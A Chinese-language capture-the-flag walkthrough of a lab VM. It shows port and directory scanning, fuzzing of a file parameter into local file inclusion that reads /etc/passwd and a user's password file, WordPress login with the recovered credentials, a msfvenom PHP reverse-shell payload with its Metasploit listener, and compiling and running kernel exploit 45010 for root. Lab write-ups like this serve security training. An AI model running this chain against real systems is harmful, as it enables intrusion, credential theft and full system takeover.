以下是靶场地址
下载安装该虚拟机,以下是虚拟机打开界面
1、探测开放端口
nmap -p 1-65535 -A 192.168.133.139
2、端口进行扫描,发现存在22端口和80端口访问80端口,如图所示:
注:
(1)查看网页源码
(2)目录扫描
(3)F12 3.利用kali自带目录扫描工具进行扫描
(1)dirb http://192.168.133.139/
(2)dirb http://192.168.133.139 -X .txt,.zip,.php
成功获得参数file,但结果却不尽人意,挖错文件名了
不过不灰心,之前我们忽略了一个参数,我们可以搞一波
curl http://192.168.133.139/index.php?file=location.txt
注:如何将kali文件下载到物理机
sz file /usr/share/wfuzz/wordlist/general/common.txt (字典路径) 4.找到正确的参数以后进行执行
curl http://192.168.133.139/image.php?secrettier360=aaahttp://192.168.133.139/image.php?secrettier360=aaa
注:提示我们终于获得正确的参数
3、利用参数请求查看passwd文件,成功获取敏感信息http://192.168.133.139/image.php?secrettier360=/etc/passwd
就在此时一个新大陆出现了
curl http://192.168.133.139/index.php?secrettier360=/home/saket/password.txt
curl http://192.168.133.139/image.php?secrettier360=/home/saket/password.txt
4、在之前我们通过目录扫描发现存在wordpress的目录,进行访问,存在登录界面,通过观察页面得到用 户名
5、利用kali自带工具cmseek进行指纹信息收集,有点尴尬,这个工具没有,我进行了下载
注:也可以利用wpscan 进行漏洞信息收集
wpscan --url http://192.168.133.139/wordpress/ --enumerate u
6、 利用找出的用户名和密码进行登录 用户名:victor 密码:follow_the_ippsec,成功登录后台
登录后台以后首先想找上传点,比如上传图片、上传文件等等
7、利用msf生成反弹链接
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.133.129 lport=7777 -o shell.php
点击保存,保存成功。
8、利用msfconsole进行监听反弹shell,通过访问写入反弹shell的php文件触发,成功弹回shell
use exploit/mulit/handler
set payload php/meterpreter/reverse_tcp set lhost 192.168.133.129
set lport 7777
exploit
得出Linux内核版本
9、 通过msfconsole 查找相关漏洞
searchsploit 16.04 Ubuntu
msfconsole的数据存储 cd /usr/share/exploitdb/exploits/linux
cp 45010.c /root
重新进行编译
gcc 45010.c
gcc 45010.c -o 45010
在之前获取到meterpreter那里进行上传
upload /root/45010 /tmp/45010
进行提权
shell #进行shell执行
cd /tmp #进入tmp文件中chmod +x 45010 #权限提升
./45010 #执行
whoami #查看当前权限450
10、成功拿到root权限以后,在root权限下会存放一些重要的文件
成功获取flag值